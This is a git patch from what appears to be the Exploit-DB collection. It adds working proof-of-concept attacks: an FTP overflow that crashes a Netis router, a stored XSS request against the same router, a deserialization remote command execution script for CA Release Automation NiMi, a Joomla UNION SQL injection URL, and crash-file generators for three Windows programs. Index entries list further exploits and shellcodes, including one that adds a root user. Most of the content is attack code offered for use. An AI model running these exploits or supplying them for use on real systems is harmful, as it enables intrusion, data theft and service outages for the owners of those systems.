From f1d68507cdef266ca17c15e63f5948422ada2da8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 18 Sep 2018 05:01:45 +0000 Subject: [PATCH] DB: 2018-09-18 7 changes to exploits/shellcodes XAMPP Control Panel 3.2.2 - Denial of Service (PoC) Notebook Pro 2.0 - Denial Of Service (PoC) Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC) Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC) CA Release Automation NiMi 6.5 - Remote Command Execution Gitweb 1.7.3.3 - Cross-Site Scripting gitWeb 1.7.3.3 - Cross-Site Scripting Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes) Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes) Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes) Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes) Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes) Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes) Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes) Linux/x86 - echo _Hello World_ + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes) --- exploits/hardware/dos/45424.py | 43 +++++++++++++++++++ exploits/hardware/webapps/45422.txt | 30 ++++++++++++++ exploits/java/remote/45425.py | 62 ++++++++++++++++++++++++++++ exploits/php/webapps/45423.txt | 14 +++++++ exploits/windows_x86-64/dos/45420.py | 28 +++++++++++++ exploits/windows_x86-64/dos/45421.py | 28 +++++++++++++ exploits/windows_x86/dos/45419.py | 29 +++++++++++++ files_exploits.csv | 9 +++- files_shellcodes.csv | 8 ++-- 9 files changed, 246 insertions(+), 5 deletions(-) create mode 100755 exploits/hardware/dos/45424.py create mode 100644 exploits/hardware/webapps/45422.txt create mode 100755 exploits/java/remote/45425.py create mode 100644 exploits/php/webapps/45423.txt create mode 100755 exploits/windows_x86-64/dos/45420.py create mode 100755 exploits/windows_x86-64/dos/45421.py create mode 100755 exploits/windows_x86/dos/45419.py diff --git a/exploits/hardware/dos/45424.py b/exploits/hardware/dos/45424.py new file mode 100755 index 000000000..363287835 --- /dev/null +++ b/exploits/hardware/dos/45424.py @@ -0,0 +1,43 @@ +# Exploit Title: Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC) +# Author: Cakes +# Discovery Date: 2018-09-16 +# Vendor Homepage: http://www.netis-systems.com +# Software Link: http://www.netis-systems.com/Home/detail/id/74.html +# Tested Version: RTK 2.1.1 +# Tested on OS: Kali Linux +# CVE: N/A + +# Description +# The FTP service is vulnerable to a Denial of Service attack. Attackers simply need to log +# into the router and send and valid FTP command with a character offset of 1461 as the command input + +import socket + +evil = '\x41'*1461 + +print "\n[*] Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)" +print "\r[i] Creating socket" +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +print "\r[i] Connecting..." +connect = s.connect(('192.168.1.1',21)) +s.recv(1024) + +try: + s.send('USER guest\r\n') + s.recv(1024) + s.send('PASS guest\r\n') + s.recv(1024) + print "\r[+] Connected" +except: + print "\r[!] Credentials aren't working. Please change if none default" + +print "\r[+] Sending Payload" + +try: + s.send('ABOR %s' % (evil)) + print "\r[+] Payload sent" + print "\r[+] Router offline" +except: + print "\r[!] Something went wrong" + +s.close() \ No newline at end of file diff --git a/exploits/hardware/webapps/45422.txt b/exploits/hardware/webapps/45422.txt new file mode 100644 index 000000000..09ea17e7f --- /dev/null +++ b/exploits/hardware/webapps/45422.txt @@ -0,0 +1,30 @@ +# Exploit Title: Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting +# Author: Cakes +# Discovery Date: 2018-09-16 +# Vendor Homepage: http://www.netis-systems.com +# Software Link: http://www.netis-systems.com/Home/detail/id/74.html +# Tested Version: RTK 2.1.1 +# Tested on OS: Kali Linux +# CVE: N/A + +# Description: +# Improper input validation on the router web interface allows attackers add a persistent +# Cross-Site scripting attack on the Dynamic DNS hostname field. Simply intercept a renaming +# request and add in the XSS + +# Poc + +POST /form2Ddns.cgi HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Referer: http://Target/ddns.htm?v=1537192256000 +Cookie: SessionID= +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 119 + +ddnsProv=0&hostname=&interface=15&enable=on&username=tester&password=tester&addacc=Add&submit.htm%3Fddns.htm=Send \ No newline at end of file diff --git a/exploits/java/remote/45425.py b/exploits/java/remote/45425.py new file mode 100755 index 000000000..02e2a5437 --- /dev/null +++ b/exploits/java/remote/45425.py @@ -0,0 +1,62 @@ +# Exploit Title: CA Release Automation NiMi 6.5 - Remote Command Execution +# Date: 2016-06-23 +# Exploit Authors: Jakub Palaczynski, Maciej Grabiec +# Vendor Homepage: http://www.ca.com/ +# Software Link: https://docops.ca.com/ca-release-automation/5-5-2/en/installation/deploy-agents/ +# Version: CA Release Automation (NiMi) 5.X, 6.3, 6.4, 6.5 +# CVE: CVE-2018-15691 +# Info: CA Release Automation (NiMi) Remote Command Execution via Deserialization +# Info: Payloads generated using CommonsCollections1 from ysoserial work correctly. +# Info: Proof of Concept exploits NiMi service if security is turned off. + +#!/usr/bin/python + +import socket +import sys +import struct + +if len(sys.argv) < 4: + sys.stderr.write("[-]Usage: python %s \n" % sys.argv[0]) + sys.stderr.write("[-]Exemple: python %s 10.0.0.1 6600 /tmp/payload.bin\n" % sys.argv[0]) + exit(1) + +host = sys.argv[1] +port = sys.argv[2] +file = sys.argv[3] + +# check if payload does not exceed specified value +payloadObj = open(file,'rb').read() +if len(payloadObj) > 5729: + print 'Payload must be less than 5730 bytes. Try another one.' + exit(1) + +# open socket to nimi port +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +print 'Connecting to node.' +sock.connect((host, int(port))) + +# say hello to nimi +sock.recv(256) +sock.send('\x00\x00\x00\x0c\x0a\x04\x6e\x6f\x64\x65\x10\x0a\x72\x02\x08\x00') # first required message + +# get Node ID +data = sock.recv(256) +name = data[5] + data[6:6+ord(data[5])] +if len(sys.argv) == 5: + name = struct.pack(">B", len(sys.argv[4])) + sys.argv[4] + +# check if security is enabled +sock.send('\x00\x00\x00\x1a\x0a\x04\x6e\x6f\x64\x65\x10\x0a\x7a\x10\x0a\x0c\x0a\x07\x30\x2e\x30\x2e\x30\x2e\x30\x10\x94\x3c\x10\x00') # second required message +check = sock.recv(256) +if check == "": + print 'Security is enabled. Sorry.' + exit(1) + +# send payload +print 'Sending payload.' +header = '\x0a\x04\x6e\x6f\x64\x65\x10\x01\x1a' + name + '\x2a\xe4\x2c\x0a\xe1\x2c' +stage = header + payloadObj + '\x90' * (5729-len(payloadObj)) +payload = struct.pack(">I", len(stage)) + stage + +sock.sendall(payload) +sock.close() \ No newline at end of file diff --git a/exploits/php/webapps/45423.txt b/exploits/php/webapps/45423.txt new file mode 100644 index 000000000..d2d5cfd74 --- /dev/null +++ b/exploits/php/webapps/45423.txt @@ -0,0 +1,14 @@ +# Title: Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection +# Date: 2018-09-14 +# Exploit Author: Hamza Megahed +# Vendor Homepage:https://www.joomla.org/ +# Download: https://arkextensions.com/products/jck-editor +# Version: 6.4.4 +# Tested on: Ubuntu, FireFox, +# CVE: N/A + +# Parameter = parent +# Payload = " UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL -- aa +# Poc: + +Test = [HOST]/[PATH]/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45420.py b/exploits/windows_x86-64/dos/45420.py new file mode 100755 index 000000000..f27d11b75 --- /dev/null +++ b/exploits/windows_x86-64/dos/45420.py @@ -0,0 +1,28 @@ +# Exploit Title : Notebook Pro 2.0 - Denial Of Service (PoC) +# Exploit Author : Ali Alipour +# WebSite : http://Alipour.it +# Date: 2018-09-14 +# Vendor Homepage : http://www.stokedonit.com/apps/notebook-pro/ +# Software Link Download : https://www.microsoft.com/store/apps/9WZDNCRDMC76 +# Tested on : Windows 10 - 64-bit + +# Steps to Reproduce +# Run the python exploit script, it will create a new +# file with the name "Notebook.txt" just copy the text inside "Notebook.txt" +# and start the Notebook Pro 2.0 - In Microsoft Windows 10 . +# In The New Window Click On " New " And Click On notebook Button ( Create a New NoteBook ) . +# Now Paste The Content Of "Notebook.txt" Into The Field: " New NoteBook Name ". +# Click "Create & Save" And You Will See a [ Boom !!!! ] - Notebook Pro 2.0 - In Microsoft Windows 10 [ Crash ]. + +#!/usr/bin/python + +buffer = "A" * 500 +payload = buffer +try: + f=open("Notebook.txt",22"w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45421.py b/exploits/windows_x86-64/dos/45421.py new file mode 100755 index 000000000..291e275f1 --- /dev/null +++ b/exploits/windows_x86-64/dos/45421.py @@ -0,0 +1,28 @@ +# Exploit Title: Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC) +# Discovery by: Jose Eduardo Castro +# Discovery Date: 2018-09-14 +# Vendor Homepage: https://www.virtualbox.org/ +# Software Link: https://download.virtualbox.org/virtualbox/5.2.18/VirtualBox-5.2.18-124319-Win.exe +# Tested Version: 5.2.18 r124319 +# Tested on OS : Windows 7 Ultimate x64 es + +#!/usr/bin/env python +#-*-coding: utf-8-*- +# Steps to Produce the DoS: +# 1.- Run python code : python vb_dos.py +# 2.- Open string.txt and copy content to clipboard +# 3.- Open VM VirtualBox Manager +# 4.- Select a created virtual machine in mode "power off" and select "Settings" +# 5.- Select "Storage" button +# 6.- Select option "Adds new storage controller" and select any controller +# 7.- Paste ClipBoard on "Name" +# 8.- Clic OK +# 9.- DoS + +import socket, os, sys + +buffer = "\x41" * 5000 + +f = open ("string.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows_x86/dos/45419.py b/exploits/windows_x86/dos/45419.py new file mode 100755 index 000000000..8b085e1a3 --- /dev/null +++ b/exploits/windows_x86/dos/45419.py @@ -0,0 +1,29 @@ +# Exploit Title: XAMPP Control Panel 3.2.2 - Denial of Service (PoC) +# Exploit Author: Gionathan "John" Reale +# Date: 2018-09-14 +# Software: XAMPP +# Version: 3.2.2 / 7.2.9 (Newest version at time of writing) +# Download: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/7.2.9/xampp-portable-win32-7.2.9-0-VC15-installer.exe/download +# Tested on: Windows 7 32bit + +# Steps to Reproduce: +# Run the python exploit script, it will create a new file with the name "exploit.txt". +# Copy the contents of "exploit.txt" +# Start the program and click "Config(Top Right With Symbol)" +# Paste the contents of "exploit.txt" into the following fields:"Editor" & "Browser". +# Click "Save" and then in the main window Click "Config" > "Apache (httpd.conf)". +# You will see a crash! + +#!/usr/bin/python + +buffer = "A" * 6000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d3a173108..aa7081f4b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6112,6 +6112,10 @@ id,file,description,date,author,type,platform,port 45410,exploits/windows_x86-64/dos/45410.py,"CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)",2018-09-14,"Alan Joaquín Baeza Meza",dos,windows_x86-64, 45413,exploits/windows_x86/dos/45413.py,"InfraRecorder 0.53 - '.txt' Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86, 45414,exploits/windows_x86-64/dos/45414.py,"Faleemi Plus 1.0.2 - Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86-64, +45419,exploits/windows_x86/dos/45419.py,"XAMPP Control Panel 3.2.2 - Denial of Service (PoC)",2018-09-17,"Gionathan Reale",dos,windows_x86, +45420,exploits/windows_x86-64/dos/45420.py,"Notebook Pro 2.0 - Denial Of Service (PoC)",2018-09-17,"Ali Alipour",dos,windows_x86-64, +45421,exploits/windows_x86-64/dos/45421.py,"Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC)",2018-09-17,"Jose Eduardo Castro",dos,windows_x86-64, +45424,exploits/hardware/dos/45424.py,"Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)",2018-09-17,cakes,dos,hardware, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -16802,6 +16806,7 @@ id,file,description,date,author,type,platform,port 45283,exploits/hardware/remote/45283.rb,"Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure",2018-08-29,BrianWGray,remote,hardware, 45345,exploits/linux/remote/45345.txt,"Tenable WAS-Scanner 7.4.1708 - Remote Command Execution",2018-09-07,"Sameer Goyal",remote,linux, 45367,exploits/multiple/remote/45367.rb,"Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit)",2018-09-10,Metasploit,remote,multiple, +45425,exploits/java/remote/45425.py,"CA Release Automation NiMi 6.5 - Remote Command Execution",2018-09-17,"Jakub Palaczynski",remote,java, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -25254,7 +25259,7 @@ id,file,description,date,author,type,platform,port 33671,exploits/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,webapps,php, 15701,exploits/php/webapps/15701.txt,"MODx REvolution CMS 2.0.4-pl2 - POST injection Cross-Site Scripting",2010-12-06,LiquidWorm,webapps,php, 15703,exploits/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b - Arbitrary File Upload",2010-12-07,"Sun Army",webapps,asp, -15744,exploits/cgi/webapps/15744.txt,"Gitweb 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,webapps,cgi,80 +15744,exploits/cgi/webapps/15744.txt,"gitWeb 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,webapps,cgi,80 15710,exploits/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",webapps,multiple, 15711,exploits/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - Local File Inclusion",2010-12-09,Br0ly,webapps,php, 15714,exploits/php/webapps/15714.txt,"Joomla! Component JE Auto 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",webapps,php, @@ -39967,3 +39972,5 @@ id,file,description,date,author,type,platform,port 45400,exploits/windows/webapps/45400.txt,"Apache Syncope 2.0.7 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows, 45409,exploits/linux/webapps/45409.rb,"Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit)",2018-09-14,"Stephen Shkardoon",webapps,linux,443 45411,exploits/php/webapps/45411.txt,"Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection",2018-09-14,"Ceylan BOZOĞULLARINDAN",webapps,php,80 +45422,exploits/hardware/webapps/45422.txt,"Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting",2018-09-17,cakes,webapps,hardware, +45423,exploits/php/webapps/45423.txt,"Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection",2018-09-17,"Hamza Megahed",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index dd333117d..2e8a7587d 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -908,7 +908,7 @@ id,file,description,date,author,type,platform 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64 45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm 45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm -45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 -45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 -45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 -45418,shellcodes/linux_x86/45418.c,"Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 +45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 +45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 +45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 +45418,shellcodes/linux_x86/45418.c,"Linux/x86 - echo _Hello World_ + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86